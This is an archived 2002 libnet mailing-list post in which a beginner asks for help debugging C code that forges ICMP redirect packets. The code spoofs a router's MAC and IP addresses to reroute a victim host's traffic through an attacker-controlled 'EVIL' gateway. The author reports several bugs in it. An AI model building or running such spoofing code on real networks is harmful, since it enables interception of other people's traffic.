[prev in list] [next in list] [prev in thread] [next in thread]
List: libnet
Subject: ICMP redirect behaviour
From: Jean-Francois Agneessens <_zorglub_ () yahoo ! com>
Date: 2002-08-08 20:52:01
[Download RAW message or body]
Hi,
I was busy writing a icmp_redirect with libnet 1.1.0 and have several
strange problem I can't resolve. I wrote before an ARP/ethernet man in the
middle with libnet and libpcap without having any problem but here I'm
lost. I tried to look at the samples to find my error(s) but can't find
any :
first : libnet 1.1.0 (5aug02), linux 2.4.17, i686 SMP
then : it's the third time I write a program in C --> low level of
programming
1) when using ethereal 0.9.5 (compiled with libpcap 0.7.1), it keeps
telling me that the MAC SRC adress ends with FF:FF , altough my code don't
tell this (I use the same in my MitM program without problem)
2)I transform the IP address of the new gateway using libnet_name2addr4
for converting a human readable IP address to a dword.It isn't a problem
for the fields of source and destination IP's in libnet_build_ipv4, but
when I use the same function to write to the gateway field of an ICMP
redirect, 192.168.80.100 become 100.80.168.192 ...
3) I leave both the IP checksum and ICMP checksum at a value of 0, but
they stay at 0 when the packet is sent on the wire. there's no
libnet_do_checksum anymore and I understood it was done automatically. It
seems it's not the case.
4) what is the role of libnet_adv_cull_packet ?
thanks for your help
Jean-Francois Agneessens
my code:
---------------------------
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include<string.h>
#if (HAVE_CONFIG_H)
#include "../include/config.h"
#endif
#include "../include/libnet.h"
#include <signal.h>
u_char macsrc[18] ="00:20:AF:F1:66:62\0"; //adresse MAC du routeur
u_char macdst[18] ="00:60:97:6D:51:A0\0"; //adresse MAC de A
u_char *ip_src = "192.168.80.1\0";//adresse IP du routeur
u_char *ip_dst = "192.168.80.10\0";//adresse IP de A
u_char *ip_fak = "192.168.80.100\0"; //adresse IP de EVIL
u_char *device = "eth1"; // interface reseau
u_char mac_src[6],mac_dst[6];
char errormsg[LIBNET_ERRBUF_SIZE];
libnet_t *t;
libnet_ptag_t eth,ip,icmp;
u_long ipsrc, ipdst, ipfak;
int error;
u_char *packet;
u_long packet_s;
/* definition de fonctions*/
void handle_sigterm(int signal);
/* initialisation de la librairie libnet*/
void libinit()
{
t=libnet_init(LIBNET_LINK_ADV, device, errormsg);
if (t == NULL)
{
fprintf(stderr, "libnet_init n'a pas fonctionné : %s \n", errormsg);
}
return;
}
/* transformation des adresses MAC en format "pc" */
/* cut and paste de Frédéric Raynal, frederic.raynal@inria.fr */
void getmac(char *eth_str, u_char *eth)
{
unsigned int tmp[6];
int i; i = sscanf(eth_str, "%02X:%02X:%02X:%02X:%02X:%02X",
&tmp[0], &tmp[1], &tmp[2], &tmp[3], &tmp[4], &tmp[5]);
#ifdef _DEBUG_
if (i != 6)
printf("** Error: invalid eth address (%s).\n", eth_str);
#endif
for(i = 0;i < 6;i++) eth[i] = tmp[i];
return;
}
/* construction du paquet */
void buildpacket()
{
/* resolution des adresses IP */
ipsrc=libnet_name2addr4(t,ip_src,LIBNET_RESOLVE);
ipdst=libnet_name2addr4(t,ip_dst,LIBNET_RESOLVE);
ipfak=libnet_name2addr4(t,ip_fak,LIBNET_RESOLVE);
/* paquet*/
icmp=libnet_build_icmpv4_redirect(
ICMP_REDIRECT, //type
1,// = redirect for host
0,//checksum
ipfak,//nouveau gateway (EVIL)
60,//longueur msg original
0,//tos original
500,//id original
0,//frag original
255,//TTL original
IPPROTO_ICMP, //protocole original
0, //checksum original
ipsrc,//ip src originale (A)
ipdst, //ip dst originale (B, par
exemple
//mais peut être toute adresse
IP
//dont B est le gateway pour A)
NULL, //payload
0, //taille payload
t,
icmp
);
if (icmp==-1)
{
fprintf(stderr, "probleme construction icmp: %s\n", libnet_geterror
(t));
}
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_ICMPV4_REDIRECT_H,/*
length */
0,/* TOS */
666,/* IP ID */
0,/* IP Frag */
255,/* TTL */
IPPROTO_ICMP,/* protocol */
0, /* checksum */
ipsrc,/* source IP donc le routeur*/
ipdst,/* destination IP donc A*/
NULL,/* payload */
0,/* payload size */
t,/* libnet handle */
ip
);
if (ip==-1)
{
fprintf(stderr, "probleme construction ip: %s\n", libnet_geterror
(t));
}
eth=libnet_build_ethernet(
mac_dst, //destination, soit A
mac_src, //B est la source
ETHERTYPE_IP, //sans commentaires
NULL,
0,
t, //libnet handle
eth
);
if (eth==-1)
{
fprintf(stderr, "probleme construction eth: %s\n", libnet_geterror
(t));
}
return;
}
/* envoi du datagramme */
void sendpacket()
{
/*
error=libnet_adv_cull_packet(t, &packet, &packet_s);
if (error==-1)
{
fprintf(stderr, "probleme de construction du paquet : %s \n",
libnet_geterror(t));
}
*/
error=libnet_write(t);
if (error==-1)
{
fprintf(stderr, "probleme d'envoi du paquet : %s \n", libnet_geterror
(t));
}
return;
}
/* liberation de la memoire */
void freemem() {
libnet_destroy(t);
return;
}
/* reception du sigterm */
void handle_sigterm(int signal)
{
if (signal !=SIGTERM)
return;
else
{
printf("SIGTERM received\n");
freemem();
exit(0);
}
}
/* MAIN PROGRAM */
int main()
{
/* blah blah de départ */
int n;
getmac(macsrc,mac_src);
getmac(macdst,mac_dst);
libinit();
buildpacket();
for (n=0;n<5;n++)
{
sendpacket();
signal(SIGTERM,handle_sigterm);
usleep(5);
}
return 1;
}
/*EOF*/
---------------------------------------------------------------------
To unsubscribe, e-mail: libnet-unsubscribe@securityfocus.com
For additional commands, e-mail: libnet-help@securityfocus.com
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic